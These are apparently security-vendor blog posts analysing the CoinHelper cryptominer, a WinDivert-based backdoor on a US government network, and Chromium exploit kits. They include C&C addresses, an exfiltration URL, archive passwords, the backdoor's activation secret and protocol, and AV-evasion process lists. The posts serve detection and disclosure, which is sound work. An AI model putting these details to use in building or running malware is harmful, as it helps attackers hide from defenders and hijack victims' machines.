We encountered many different applications bundled with CoinHelper. Research regarding these bundles is provided in a standalone subsection Bundled apps overview.

Mapping the victims

In addition to fixing the damaged archive, executing the second stage, and ensuring persistence, the first stage holds one additional functionality that is quite simple, but effective.

The malware uses public services, such as IP loggers, to aggregate information about victims. The IP loggers are basically URL shorteners that usually provide comprehensive telemetry statistics over the users clicking on the shortened link.

Additionally, as we will see further in this blogpost, the attacker harvests information about victims, focusing on the victim’s OS, amount of RAM installed, the CPU and video card information, as well as the security solutions present on the system. All the collected information is formatted and concatenated to a single string.

This string is then sent to a hardcoded URL address in the form of a user-agent via GET request. In our sample, the hardcoded URL looks like https://2no[.]co/1wbYc7.

Note that URLs such as these are sometimes also used in the second stage of CoinHelper as well. From our dataset, we have found 675 different URLs where the malware sends data.

Because the attackers often use public services without authentication, we can actually peek inside and figure out the figures from their perspective. The bottom line is that they are making a statistical evaluation of their various infection vectors (bundled installers from unofficial software sources, torrents, MyKings botnet, and more) across the infected user base, effectively trying to focus on people with higher-end machines as well as getting to know which regions in the world use what antivirus and/or security solutions.

As an example, we can see information available on one of the many still-active links containing a date and time of the click, IP address (anonymized) and ISP, corresponding geolocation, used web browser and of course, the user-agent string with the harvested data.

Attacker’s view on the infected victims (black squares are anonymized IP addresses)

The attacker also has access to the geographic location of the victims in a map view.

Attacker’s view on the geographic information of the infected victims

In the sections below, the reader can find further details of how the information is obtained in the first stage of the malware, along with further details about the harvested data.

Checking the CPU 

The malware executes one of the two variants of shellcodes (x86 and x64), present in hexadecimal form:

  • 0x5589E5538B45088B4D0C31DB31D20FA28B6D10894500895D04894D0889550C5B5DC3
  • 0x5389C889D131DB31D20FA26741890067418958046741894808674189500C5BC3

When we disassemble the shellcodes, we can see common cpuid checks, returning all its values (registers EAX, EBX, ECX, EDX). Thus, the malware effectively harvests all the information of the currently present processor of the victim, its model and features.

x86 CPUID check
x64 CPUID check

All the information is parsed and particular features are extracted. Actually, the feature lists in the malware are identical to the CPUID Wikipedia page, exactly pointing out where the attacker was inspired.

Even though all the information is harvested, only the AES instruction set bit is actually checked – if the processor supports this instruction set and it is x64, only then it will install the x64 bit version of the final stage (coinminer). In the other case, the x86 version is used.

As we mentioned, the rest of the information is collected, but it is actually not used anywhere in the code.

CPU and video card information

The cpuid check is not the only one that performs HW checks on the victim’s system. Two additional WMI queries are used to obtain the names of the victim’s processor and video card:
SELECT * FROM Win32_Processor
SELECT * FROM Win32_VideoController

Furthermore, the malware uses GetSystemInfo to collect the SYSTEM_INFO structure to check the number of cores the victim’s CPU has.

AV checks

The script also checks for running processes, searching for security solutions present on the machine. This information is once again “just” logged and sent to the IP logging server – no other action is done with this information (e.g. altering malware’s functionality).

The complete list of all the checked AV / Security solutions by their processes, as presented in the malware, can be found in Appendix.

Exploring the second stage – asacpiex.dll

Now, let’s dive into the second stage of the malware. After the asacpiex.dll archive is fixed, it is saved as CR_Debug_Log.txt to the Temp folder.

To unpack the archive, the malware uses a password JDQJndnqwdnqw2139dn21n3b312idDQDB. This is the most common password for these AutoIt droppers. However, it is not the only one and so far, we counted two additional passwords:

Unpacking reveals two additional files:

  • 32.exe
  • 64.exe

Depending on the architecture of the OS and whether the AES instruction set is available, one of these files is copied into
and executed (via a scheduled task).

Both of these files are once again compiled AutoIt scripts, carrying functionality to distribute further payloads, in the form of coinminers, to victims via Tor network.

After the decompilation of the files, we can see that both of the output scripts are very similar. The only difference is that the x64 version tries to also utilize the user’s graphic card as well if possible for coinmining, not just the CPU. In the text below, we will focus on the x64 version since it contains more functionality.

Although Helper.exe is the most common name of the malware by far, it is not the only possibility. Other options we’ve seen in the wild are for example:

  • fuck.exe
  • Helperr.exe
  • svchost.exe
  • System.exe
  • system32.exe
  • WAPDWA;DJ.exe
  • WorkerB.exe


As we already mentioned, the primary goal of the Helper.exe dropper is to drop an XMRig coinminer onto the victim’s system via Tor network. The coinminer is executed with a hardcoded configuration present in the script.

Helper.exe holds a variety of other functionalities as well, such as performing several system checks on the victim’s PC, injecting itself into %WINDIR%\System32\attrib.exe system binary, checking the “idleness” of the system to intensify the mining, and more. Let’s now have a look at how all these functionalities work.

Downloading coinminers via Tor network

The main purpose of the dropper is to download a payload, in our case a coinminer, onto the infected system. To do so, the malware performs several preparatory actions to set up the environment to its needs.

First and foremost, the malware contains two additional files in hexadecimal form. The first is once again a clean 7zip binary (but different than CL_Debug_Log.txt) and the second one is a 7zip archive containing a clean Tor binary and belonging libraries:

  • libcrypto-1_1-x64.dll
  • libevent-2-1-7.dll
  • libevent_core-2-1-7.dll
  • libevent_extra-2-1-7.dll
  • libgcc_s_seh-1.dll
  • libssl-1_1-x64.dll
  • libssp-0.dll
  • libwinpthread-1.dll
  • tor.exe
  • zlib1.dll

To be able to unpack Tor, a password DxSqsNKKOxqPrM4Y3xeK is required. This password is also required for unpacking every downloaded coinminer as well, but we will get to that later.

After Tor is executed, it listens on port 9303 on localhost ( and waits for requests. To prevent confusion at this point, note that this execution is hidden by default because tor.exe should not be mistaken for a Tor browser. tor.exe is a process providing Tor routing (without a GUI). In a common Tor browser installation, it can be usually found in \<Tor browser root folder>\Browser\TorBrowser\Tor\tor.exe.

The script further contains a few Base64 encoded Tor addresses of the C&C servers and tries which one is alive. This is done by initializing SOCKS4 communication via a crafted request (in the hexadecimal form):
04 01 00 50 00 00 00 FF 00 $host 00
where $host is the demanded server address.

The malware expects one of the standard protocol responses and only if the response contains 0x5A byte, the malware will further proceed to communicate with the server.

Byte Meaning
0x5A Request granted
0x5B Request rejected or failed
0x5C Request failed because client is not running identd (or not reachable from server)
0x5D Request failed because client’s identd could not confirm the user ID in the request

The lists of Tor addresses differ quite a bit across multiple samples. So far we’ve seen 24 unique C&C servers (see our IoC repository for the complete list). However, at the time of writing, only two of all the servers were still active:

  • 2qepteituvpy42gggxxqaaeozppjagsu5xz2zdsbugt3425t2mbjvbad[.]onion
  • jbadd74iobimuuuvsgm5xdshpzk4vxuh35egd7c3ivll3wj5lc6tjxqd[.]onion

If we access the server using e.g. Tor browser, we can see a default Windows Server landing page, illustrated in figure below. Note that this is a very common landing page for MyKings C&Cs. However, this single fact is not sufficient for attributing CoinHelper to MyKings.

Default Windows Server landing page. The same image is also commonly present on MyKings C&C servers, but that is not sufficient for attribution.

The malware is capable of downloading four files in total from an active server, present in a “public” subfolder:

  • public/upd.txt
  • public/64/64.txt (or public/32/32.txt if the “32 bit variant” of the script is used)
  • public/vc/amd.txt
  • public/vc/nvidia.txt

The files 64.txt (32.txt), amd.txt, and nvidia.txt are all XMRig coinminers (encoded and compressed), both for CPU or an according GPU card.

The upd.txt file is a plaintext file containing a version number bounded by _ and ! symbols, for example _!1!_. The malware asks the server what’s the version and if the version is newer, all coinminers are updated (downloaded again).

The miners are downloaded as a hexadecimal string from the C&C, ending with a constant string _!END!_. After the end stub is removed and the string decoded, we get a 7zip archive. Once again, we can use the DxSqsNKKOxqPrM4Y3xeK password to unpack it.

After the unpacking, we can get these files:

  • SysBackup.txt – for CPU miners (both 32 and 64 bit)
  • SysBackupA.txt – when there is also AMD GPU detected
  • SysBackupN.txt – when there is also NVIDIA GPU detected

These files are once again present in a hexadecimal form, this time starting with 0x prefix and without the end stub.

Furthermore, a few additional files can be found with the “SysBackup” files for ensuring the mining functionality and optimal mining, when appropriate (for example xmrig-cuda.dll for NVIDIA cards).

The download process can be seen in the following visualisation:


The coinmining (and the 7zip unpacking) is executed via process injection. The CPU coinmining is performed by injecting into a newly created and suspended process of %WINDIR%\System32\attrib.exe.

Execution of all the other components, such as GPU mining or unpacking of the coinminer payloads downloaded from Tor, is done by injecting into itself, meaning a new suspended instance of Helper.exe is used for the injection. When there is coinmining on GPU supported, both CPU and GPU are executed in parallel.

Note that the injection is done by a publicly available AutoIt injector, so the author chose the copy+paste way without reinventing the wheel.

From our research, we’ve only seen XMRig to be deployed as the final coinmining payload. The malware executes it with common parameters, with one approach worth mentioning – a parameter setting the password for the mining server “-p”. In standard situations, the password doesn’t really matter so the malware authors usually use “x” for the password. In this case, however, the malware generates a GUID of the victim and appends it to the usual “x”.

The GUID is created by concatenating values from one of the WMI queries listed below:
SELECT * FROM Win32_ComputerSystemProduct
SELECT * FROM Win32_Processor
SELECT * FROM Win32_PhysicalMedia

Which query should be used is defined in the configuration of the AutoIt script. The GUID is created by hashing the obtained information using MD5 and formatted as a standard GUID string:

With this approach, the malware author is in fact able to calculate the exact number of infected users who are actually mining, because all the mining will be performed via a unique password, passing it as an ID of the “worker” (= victim) to the pool.


Similarly to the first stage, at the beginning of the second stage, particular mutexes are checked and created if necessary:

  • QPRZ1bWvXh
  • QPRZ1bWvXh2

As we can see, only the number in the middle of the mutex is changed compared to the first stage (QPRZ3bWvXh). The second mutex has an appended 2 as a constant. We have also seen QPRZ2bWvXh used as well, once again changing the middle number.

For the sake of staying hidden for the longest time possible, the malware checks several processes using a native AutoIt ProcessExists function for any running system monitoring and analysis tools:

  • aida64.exe
  • AnVir.exe
  • anvir64.exe
  • GPU-Z.exe
  • HWiNFO32.exe
  • HWiNFO64.exe
  • i7RealTempGT.exe
  • OpenHardwareMonitor.exe
  • pchunter64.exe
  • perfmon.exe
  • ProcessHacker.exe
  • ProcessLasso.exe
  • procexp.exe
  • procexp64.exe
  • RealTemp.exe
  • RealTempGT.exe
  • speedfan.exe
  • SystemExplorer.exe
  • taskmgr.exe
  • VirusTotalUpload2.exe

When the tool is spotted, the malware temporarily disables the mining. The information about running coinminers is stored in two files:


As their names might disclose, a particular PID of the running (GPU) coinminer is written there.

The malware also monitors whether the victim actually uses their PC at the moment. If the user is idle for a while, in our particular case for 3 minutes, the current coinmining is terminated and a new coinmining process is executed and set to leverage 100% of the CPU on all threads. This information (PID) is stored in a file called mn.ld. When the PC is actively used, the mining is set to 50% of the available performance. On the other hand, GPU mining is performed only when the user is not actively using their PC (for 2 minutes).

The malware also lists all console windows present on the system and finds out those that have visibility set to hidden. If such a window is found and it doesn’t belong to CoinHelper, the malware considers it as a competing miner and kills the process.

Data harvesting and AV checks

Similarly to the previous AutoIt stage, Helper.exe collects information about the infected system, too, as shown in the table below:

Information Purpose
Number of available CPU threads If the victim’s system is idle, the malware leverages all CPU threads
Video card type What kind of card is used – for Nvidia or AMD optimized coinmining
CPU type Not used (*see below)
Security solution Not used (*see below)
HW ID hashed by MD5 Appended to XMRig password, resulting in a parameter -p xMD5 (see Coinmining for details)

As we could see (*) in the table above, the code actually contains functions for the harvesting of some information that is not actually executed. This means that while it could gather this information, it doesn’t. Due to similarities with the first stage, we suppose that the authors have forgotten some artifacts of previous versions due to shifts of functionality between the first AutoIt stage and the Helper.exe stage.

The malware recognizes which graphic card is available on the infected system. These cards are detected using the WMI query on Win32_VideoController. You can find all the cards, as presented in the malware, in the table below:

AMD Series AMD Model
RX 460, 470, 480, 540, 550, 560, 570, 580, 590, 640, 5500, 5600, 5700, 6800, 6900
R5 230
R7 240
VEGA 56, 64
Radeon 520, 530, 535, 540, 550, 610, 620, 625, 630, VII
WX 3100, 5100
Nvidia Series Nvidia Model
GTX 750, 970, 980, 980, 1050, 1060, 1070, 1080, 1650, 1660, TITAN
RTX 2050, 2060, 2070, 2080, 3060, 3070, 3080, 3090
GT 710, 720, 730, 740, 1030
Quadro K1000, K1200, P400, P620, P1000, P2000, P2200, P5000

If any card from above is detected and also the video adapter name matches either “Advanced Micro Devices, Inc.” or “NVIDIA”, the malware uses XMRig to leverage GPU for coinmining.

From the list of graphic cards, it is apparent that the malware doesn’t hesitate to leverage the newest models of graphic cards.

Bundled apps overview

After looking at the software that the infected victims originally wanted to install, we can conclude that CoinHelper can be bundled with practically anything. So far, we’ve seen over 2,700 different apps bundled with CoinHelper (differentiating by unique SHA256 hashes). The majority of the software consists of clean installers, cracked software, cracked games or game cheats like ChromeSetup, Photoshop, MinecraftSetup, Assassin’s Creed Valhalla, CyberPunk 2077 Trainer or AmongUs cheats. With repertoire like this, the authors of CoinHelper are able to reach out to almost any type of audience ensuring successful spread of the malware.

Persuading someone to download supposedly clean software, which is in reality bundled with malware, is easier than persuading someone to willingly download malware which is secretly bundled with another malware. Authors of CoinHelper are not afraid of this challenge as we observed CoinHelper to be also bundled with samples of malware like 888 RAT or njRAT. We assume that with this approach, the target group of people gets extended by “script kiddies” and inexperienced people with an interest in malware. As this group of people is very specific, there are only a few samples of malware in comparison with the amount of other software. Graphical overview of this proportion can be seen also in the image below.

Origin of the bundled apps

Apart from the Yandex Disk storage from where we started our investigation, we can confirm that another considerable method of spreading CoinHelper is via malicious torrents placed on internet forums focused on cracked software.

Forums overview

The authors of the malware successfully made it easy for people to stumble upon the malicious torrents. During our research, we found CoinHelper bundled with software on  Russian internet forums focusing on cracked software:

  • windows-program[.]com
  • softmania[.]net

Even though we were able to find information about the number of downloads of the malware from these forums (more about this later), it wasn’t nearly enough to explain the number of hits from our user base. Because of this, we have to assume that there are tens of forums like the ones mentioned above, spreading malware through cracked software. 

More about the forums

Let’s focus on the first forum windows-program[.]com, as the other one is very similar. Between the thousands and thousands of articles, we found the samples we were looking for. As it turns out, registered user Alex4 created 29 different articles mostly containing torrents for cracked software including:

Advertised software Description & functionality
Ableton Live Suite 9.7.3 + Crack + торрент Audio workstation and music production software with current price 599 €
Dr.Web Security Space x86 x64 + ключ + торрент Anti-virus solution
ESET NOD32 Smart Security + ключи + торрент Anti-virus solution
Avast Premier 11.2.2260 + ключ + торрент Anti-virus solution
Adobe Photoshop CC 2017.1.1 + Portable + торрент Photo and image editing software
Fraps 3.5.99 на русском + crack + торрент Screen capture and screen recording utility, popular to videocapture games

As can be seen in the table above, CoinHelper can be also found bundled with multiple well-known AV solutions. Let’s take a closer look at a post about Avast AV for the sake of awareness about threats that come with downloading AV from sources like this.

First thing to notice is that the post is from 2020-11-06. It also  contains some  screenshots of the promised program, but it can be seen that it is a very old version of our AV from 2016. After launching the installation, users get to choose between installing the old version or updating AV to the newest version. Unfortunately, the installer was manipulated and neither of the options work and the no-update variant crashes the system. As a result, the output from this download for users is that they don’t get AV protection, they might crash their system and they also get infected with CoinHelper. Because of this we highly recommend downloading only signed software from verified and trustworthy sources and if possible verify hashes or checksums of installers.

As a matter of fact, neither of the AV installers worked. After launching an installer, CoinHelper would install itself and installation would fail because of various reasons. It makes sense that authors of the malware would choose malfunctioning these installers, because there is no reason to give victims a tool that kills and removes their freshly dropped malware from the system.

In the post, it is possible to download three different things:

  • A torrent file with which it is possible to download the advertised program with CoinHelper
  • A zip archive protected with a password “123” containing the advertised program with CoinHelper

After choosing between a zip archive or torrent, the page opens a new tab with information about the file to be downloaded. On the image below it is possible to see the date when the file was added to the page. Surprisingly it is 2021-07-12 and not 2020-11-06, so the file is much newer than the post referencing it. Because we have seen multiple versions of the malicious AutoIt scripts, we suppose that authors of the malware are updating these files with new versions of CoinHelper. 

Additional information that can be noticed on the image above is that the torrent file was downloaded 549 times and after adding the 508 downloads of the zip archive, we can conclude that more than 1,000 people may have got infected just from this one post on this forum. After checking all the forum posts and files uploaded by the user Alex4 we can confirm that the total number of downloads is more than 45,000 by the 2021-11-02. We consider this number to be quite alarming considering it is the spread of malware only from a single internet forum.

The second forum (softmania[.]net) is quite similar. In this case, the user from whose account the malware is spreading is WebGid4. This user has 56 publications on the forum among which you can find posts about following software:

Advertised software Description & functionality
Windows 11 64bit Pro-Home v.21 торрент Windows 11 ISO image
Adobe Photoshop Lightroom Classic 2021 v10.0 + торрен Photo and image editing software
Microsoft Office 2016 Professional Plus 16.0.7571.2075 + Ключ + Torrent MS Office package
VMware Workstation 12 Pro 12.5.4 Software that creates and runs virtual machines
Steinberg Cubase Pro 10.0.50 2020 + торрент Software for composing, recording, mixing and editing music

The first thing that caught our eyes was the ISO image of the brand new OS Windows 11. The official Windows 11 release date was 2021-10-05, which was only a few weeks before the release of this blogpost. This means that the attackers are really keeping the pace with the current trends and they try very hard to have interesting software to infect as many victims as they can.

After downloading the torrent named “Windows 11 64bit Pro-Home v.21 торрент” victims would download through the torrent client an ISO file named “windows_11_CLIENT_CONSUMER_x64FRE_en-us.iso”. This is a working ISO image of Windows 11, which installs a brand new operating system, but as a bonus it deploys CoinHelper that is inside the ISO image. After unpacking the ISO file, there is an executable called \sources\setup.exe present that contains bundled CoinHelper.

If the victims were more careful, a hint that something is sketchy could be seen after clicking on the download torrent link and opening a download page in the new tab. The torrent was added 2021-07-10, only 17 days after the official announcement of Windows 11 and ~3 months before the official release. This already raised many flags, and as we later found out, it is a Windows 11 developer version that was leaked in June 2021. This ISO image is able to successfully upgrade existing Windows OS to the new Windows 11 also with CoinHelper in it.

Seeding source

We’ve seen these malicious files being downloaded through torrents which are seeded from seed boxes. A seed box is a remote server used for storing and seeding files through the P2P network that can be rented as a service. Seed boxes serve as a layer of anonymity for attackers because instead of exposing their IP address, only the IP address of the seed box can be seen. They also ensure high availability of the content, because the seed box is supposed to be running 24/7 (unlike regular PCs). Furthermore, companies renting seed boxes also offer different bandwidths to be able to support even higher download rates.

When we looked into the malicious torrents from the Alex4 on windows-program[.]com forum, we saw that the malicious content is downloaded from the server with IP 88.204.193[.]34 on port 56000 (apart from others probably already infected seeders). After taking a closer look at this IP address, we’ve found out that the IP address is located in Kazakhstan and it is connected to the service named megaseed (


In this blog post, we presented a detailed technical analysis of CoinHelper, a family of AutoIt droppers, which provides a massive coinmining campaign affecting hundreds of thousands of users worldwide. The malware is being spread in a form of a bundle with another software, being it game cheats, cracked software, or even clean installers such as Google Chrome or AV products, as well as hiding in Windows 11 ISO image, and many others.

Furthermore, we explained how the malware maps the victims of the campaign using public IP logging services to better understand the effectiveness of the chosen infection vectors in certain regions. Using these services, the malware also harvests information about victims’ security solutions and available computational power.

We explained how the malware can hide literally in any software from unofficial sources. The scope of the spreading is also supported by seeding the bundled apps via torrents, further abusing the unofficial way of downloading software.

Indicators of Compromise (IoC)

SHA256 File name
83a64c598d9a10f3a19eabed41e58f0be407ecbd19bb4c560796a10ec5fccdbf start.exe
cc36bb34332e2bc505da46ca2f17206a8ae3e4f667d9bdfbc500a09e77bab09c asacpiex.dll
ea308c76a2f927b160a143d94072b0dce232e04b751f0c6432a94e05164e716d CL_Debug_Log.txt
126d8e9e03d7b656290f5f1db42ee776113061dbd308db79c302bc79a5f439d3 32.exe
7a3ad620b117b53faa19f395b9532d3db239a1d6b46432033cc0ef6a8d2377cd 64.exe
7387e57e5ecfdba01f0ad25eeb49abf52fa0b1c66db0b67e382d3b9c057f51a8 32.txt
ff5aa6390ed05c887cd2db588a54e6da94351eca6f43a181f1db1f9872242868 64.txt
6753d1a408e085e4b6243bfd5e8b44685e8930a81ec27795ccd61f8d54643c4e amd.txt
93dd8ef915ca39f2a016581d36c0361958d004760a32e9ee62ff5440d1eee494 nvidia.txt
Logging services


List of checked security solutions

AV / Security solution Checked processes
Avast AvastUI.exe, AvastSvc.exe
NOD egui.exe, ekrn.exe
Kaspersky avp.exe, avpui.exe
AVG avguix.exe, AVGUI.exe
Dr.web dwengine.exe
Ad-Aware AdAwareTray.exe, AdAwareDesktop.exe
SecureAPlus SecureAPlus.exe, SecureAPlusUI.exe
Arcabit arcabit.exe, arcamenu.exe
Bitdefender seccenter.exe, bdagent.exe, bdwtxag.exe, agentcontroller.exe
Comodo cis.exe, vkise.exe
Cybereason CybereasonRansomFree.exe
Emsisoft a2guard.exe, a2start.exe
eScan escanmon.exe, TRAYICOS.exe, escanpro.exe
F-Prot FProtTray.exe, FPWin.exe
GData AVKTray.exe, GDKBFltExe32.exe, GDSC.exe
ikarus guardxkickoff.exe, virusutilities.exe
K7AntiVirus K7TSecurity.exe, K7TSMain.exe, K7TAlert.exe
MaxSecure Gadget.exe, MaxProcSCN.exe, MaxSDTray.exe, MaxSDUI.exe, MaxUSBProc.exe
McAfee McDiReg.exe, McPvTray.exe, McUICnt.exe, mcuicnt.exe, MpfAlert.exe, ModuleCoreService.exe, uihost.exe, delegate.exe
MicrosoftSecurityEssentials msseces.exe
Panda PSUAConsole.exe, PSUAMain.exe
TrendMicro PtSessionAgent.exe, uiSeAgnt.exe, uiWinMgr.exe
TrendMicro-HouseCall HousecallLauncher.exe, housecall.bin, HouseCallX.exe
Webroot WRSA.exe
ZoneAlarm zatray.exe
AhnLab-V3 ASDCli.exe, ASDUp.exe, MUdate.exe, V3UPUI.exe, V3UI.exe
Avira avgnt.exe, Avira.Systray.exe, ngen.exe, Avira.VPN.Notifier.exe, msiexec.exe
Bkav BkavHome.exe
BkavPro Bka.exe, BkavSystemServer.exe, BLuPro.exe
F-Secure fshoster32.exe
Jiangmin KVMonXP.kxp, KVPreScan.exe, KVXp.kxp
Kingsoft kislive.exe, kxetray.exe
NANO-Antivirus nanoav.exe
Qihoo-360 efutil.exe, DesktopPlus.exe, PopWndLog.exe, PromoUtil.exe, QHSafeMain.exe, QHSafeTray.exe, SoftMgrLite.exe
Rising popwndexe.exe, rsmain.exe, RsTray.exe
SUPERAntiSpyware SUPERAntiSpyware.exe
Tencent QQPCTray.exe, QQPCUpdateAVLib.exe, Tencentdl.exe, TpkUpdate.exe
VBA32 vba32ldrgui.exe, VbaScheluder.exe, BavPro_Setup_Mini_C1.exe
ViRobot hVrSetup.exe, hVrTray.exe, hVrScan.exe, hVrContain.exe
Zillya ZTS.exe
Defender MSASCui.exe, MSASCuiL.exe
SmartScreen smartscreen.exe

The post Toss a Coin to your Helper (Part 2 of 2) appeared first on Avast Threat Labs.

Avast Finds Backdoor on US Government Commission Network

16 December 2021 at 17:01

We have found a new targeted attack against a small, lesser-known U.S. federal government commission associated with international rights. Despite repeated attempts through multiple channels over the course of months to make them aware of and resolve this issue they would not engage.

After initial communication directly to the affected organization, they would not respond, return communications or provide any information.

The attempts to resolve this issue included repeated direct follow up outreach attempts to the organization. We also used other standard channels for reporting security issues directly to affected organizations and standard channels the United States Government has in place to receive reports like this.

In these conversations and outreach we have received no follow up or information on whether the issues we reported have been resolved and no further information was shared with us.

Because of the lack of discernible action or response, we are now releasing our findings to the community so they can be aware of this threat and take measures to protect their customers and the community. We are not naming the entity affected beyond this description.

Because they would not engage with us, we have limited information about the attack. We are unable to attribute the attack, its impact, or duration. We are only able to describe two files we observed in the attack. In this blog, we are providing our analysis of these two files.

While we have no information on the impact of this attack or the actions taken by the attackers, based on our analysis of the files in question, we believe it’s reasonable to conclude that the attackers were able to intercept and possibly exfiltrate all local network traffic in this organization. This could include information exchanged with other US government agencies and other international governmental and nongovernmental organizations (NGOs) focused on international rights. We also have indications that the attackers could run code of their choosing in the operating system’s context on infected systems, giving them complete control.

Taken altogether, this attack could have given total visibility of the network and complete control of a system and thus could be used as the first step in a multi-stage attack to penetrate this, or other networks more deeply.

Overview of the Two Files Found

The first file masquerades as oci.dll and abuses WinDivert, a legitimate packet capturing utility, to listen to all internet communication. It allows the attacker to download and run any malicious code on the infected system. The main scope of this downloader may be to use priviliged local rights to overcome firewalls and network monitoring.

The second file also masquerades as oci.dll, replacing the first file at a later stage of the attack and is a decryptor very similar to the one described by Trend Labs from Operation red signature. In the following text we present analysis of both of these files, describe the internet protocol used and demonstrate the running of any code on an infected machine.

First file – Downloader

We found this first file disguised as oci.dll (“C:\Windows\System32\oci.dll”) (Oracle Call Interface). It contains a compressed library (let us call it NTlib). This oci.dll exports only one function DllRegisterService. This function checks the MD5 of the hostname and stops if it doesn’t match the one it stores. This gives us two possibilities. Either the attacker knew the hostname of the targeted device in advance or the file was edited as part of the installation to run only on an infected machine to make dynamic analysis harder.

We found two samples of this file:

SHA256 Description
E964E5C8A9DD307EBB5735406E471E89B0AAA760BA13C4DF1DF8939B2C07CB90 has no hash stored and it can run on every PC
C1177C33195863339A17EBD61BA5A009343EDB3F3BDDFC00B45C5464E738E0A1 is exactly the same file but it contains the hash of hostname

Oci.dll then decompresses and loads NTlib and waits for the attacker to send a PE file, which is then executed.

NTlib works as a layer between oci.dll and WinDivert.

The documentation for WinDivert describes it as “a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows 7, Windows 8 and Windows 10. WinDivert can be used to implement user-mode packet filters, packet sniffers, firewalls, NAT, VPNs, tunneling applications, etc., without the need to write kernel-mode code.”

NTlib creates a higher level interface for TCP communication by using low-level IP packets oriented functions of WinDivert. The NTLib checks if the input has magic bytes 0x20160303 in a specific position of the structure given as the first argument as some sort of authentication.

Exported functions of NTLib are:

  • NTAccept
  • NTAcceptPWD
  • NTSend
  • NTReceive
  • NTIsClosed
  • NTClose
  • NTGetSrcAddr
  • NTGetDscAddr
  • NTGetPwdPacket

The names of the exported functions are self-explanatory. The only interesting function is  NTAcceptPWD, which gets an activation secret as an argument and sniffs all the incoming TCP communication, searching for communication with that activation secret. It means that the malware itself does not open any port on its own, it uses the ports open by the system or other applications for its communication. The malicious communication is not reinjected to the Windows network stack, therefore the application listening on that port does not receive it and doesn’t even know some traffic to its port is being intercepted.

The oci.dll uses NTlib to find communications with the activation secret CB 57 66 F7 43 6E 22 50 93 81 CA 60 5B 98 68 5C 89 66 F1 6B. While NTlib captures the activation secret, oci.dll responds with Locale (Windows GUID, OEM code page identifier and Thread Locale) and then waits for the encrypted PE file that exports SetNtApiFunctions. If the PE file is correctly decrypted, decompressed and loaded, it calls the newly obtained function SetNtApiFunctions.

The Protocol

As we mentioned before, the communication starts with the attacker sending CB 57 66 F7 43 6E 22 50 93 81 CA 60 5B 98 68 5C 89 66 F1 6B (the activation secret) over TCP to any open port of the infected machine.

The response of the infected machine:

  • Size of the of the message – 24 (value: 28) [4 B]
  • Random encryption key 1 [4 B]
  • Encrypted with Random encryption key 1 and precomputed key:
    • 0 [4 B]
    • ThreadLocale [4 B]
    • OEMCP or 0 [4 B]
    • 0x20160814 (to test correctness of decryption) [4 B] 
    • 0,2,0,64,0,0,0 [each 4 B]

The encryption is xor cipher with precomputed 256 B key:


That is xored with another 4 B key.

After sending the above message the infected machine awaits for a following message with the encrypted PE file mentioned above:

  • Size of the of the message – 24 [4 B]
  • Random Encryption key 2 [4 B]
  • Encrypted  with Random encryption key 2 and precomputed key:
    • 6 (LZO level?) [4 B]
    • 0 [8 B]
    • 0x20160814 [4 B] 
    • 0x20160814 [4 B]
    • Size of the whole message [4 B]
    • Offset (0) [4 B]
    • Length (Size of the whole message) [4 B]
    • Encrypted with key 0x1415CCE and precomputed key:
      • 0 [16 B]
      • Length of decompressed PE file [4 B]
      • 0 [16 B]
      • Length of decompressed PE file [4 B]
      • 0 [16 B]
      • LZO level 6 compressed PE file

With the same encryption as the previous message.

In our research we were unable to obtain the PE file that is part of this attack. In our analysis, we demonstrated the code execution capabilities by using a library with the following function:

In a controlled lab setting, we were able to start the calculator on an infected machine over the network with the following python script (link to GitHub).

Second File – Decryptor

The second file we found also masquerages as oci.dll. This file replaced the first downloader oci.dll and likely represents another, later stage of the same attack. The purpose of this file is to decrypt and run in memory the file “SecurityHealthServer.dll”.

SHA256: 6C6B40A0B03011EEF925B5EB2725E0717CA04738A302935EAA6882A240C2229A

We found that this file is similar to the rcview40u.dll that was involved in Operation Red Signature. rcview40u.dll (bcfacc1ad5686aee3a9d8940e46d32af62f8e1cd1631653795778736b67b6d6e) was signed by a stolen certificate and distributed to specific targets from a hacked update server. It decrypted a file named rcview40.log, that contained 9002 RAT and executed it in memory.

This oci.dll exports same functions as rcview40u.dll:

The new oci.dll decrypts SecurityHealthServer.dll with RC4 and used the string TSMSISRV.dll as the encryption key. This is similar to what we’ve seen with rcview40u.dll which also uses RC4 to decrypt rcview.log with the string kernel32.dll as the encryption key.

Because of the similarities between this oci.dll and rcview40u.dll, we believe it is likely that the attacker had access to the source code of the three year-old rcview40u.dll.  The newer oci.dll has minor changes like starting the decrypted file in a new thread instead of in a function call which is what  rcview40u.dll does. oci.dll was also compiled for x86-64 architecture while rcview40u.dll was only compiled for x86 architecture.


While we only have parts of the attack puzzle, we can see that the attackers against these systems were able to compromise systems on the network in a way that enabled them to run code as the operating system and capture any network traffic travelling to and from the infected system.

We also see evidence that this attack was carried out in at least two stages, as shown by the two different versions of oci.dll we found and analyzed.

The second version of the oci.dll shows several markers in common with rcview40u.dll that was used in Operation Red Signature such that we believe these attackers had access to the source code of the malware used in that attack.

Because the affected organization would not engage we do not have any more factual information about this attack. It is reasonable to presume that some form of data gathering and exfiltration of network traffic happened, but that is informed speculation. Further because this could have given total visibility of the network and complete control of an infected system it is further reasonable speculation that this could be the first step in a multi-stage attack to penetrate this, or other networks more deeply in a classic APT-type operation.

That said, we have no way to know for sure the size and scope of this attack beyond what we’ve seen. The lack of responsiveness is unprecedented and cause for concern. Other government and non-government agencies focused on international rights should use the IoCs we are providing to check their networks to see if they may be impacted by this attack as well.

The post Avast Finds Backdoor on US Government Commission Network appeared first on Avast Threat Labs.

Exploit Kits vs. Google Chrome

12 January 2022 at 16:37

In October 2021, we discovered that the Magnitude exploit kit was testing out a Chromium exploit chain in the wild. This really piqued our interest, because browser exploit kits have in the past few years focused mainly on Internet Explorer vulnerabilities and it was believed that browsers like Google Chrome are just too big of a target for them.

#MagnitudeEK is now stepping up its game by using CVE-2021-21224 and CVE-2021-31956 to exploit Chromium-based browsers. This is an interesting development since most exploit kits are currently targeting exclusively Internet Explorer, with Chromium staying out of their reach.

— Avast Threat Labs (@AvastThreatLabs) October 19, 2021

About a month later, we found that the Underminer exploit kit followed suit and developed an exploit for the same Chromium vulnerability. That meant there were two exploit kits that dared to attack Google Chrome: Magnitude using CVE-2021-21224 and CVE-2021-31956 and Underminer using CVE-2021-21224, CVE-2019-0808, CVE-2020-1020, and CVE-2020-1054.

